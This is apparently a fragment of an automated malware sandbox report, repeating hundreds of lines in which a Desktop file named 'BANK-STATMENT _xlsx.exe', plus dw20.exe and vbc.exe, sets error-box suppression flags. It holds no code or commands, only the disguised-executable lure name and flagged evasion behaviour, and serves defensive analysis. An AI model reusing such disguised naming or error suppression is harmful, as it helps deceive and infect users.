                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
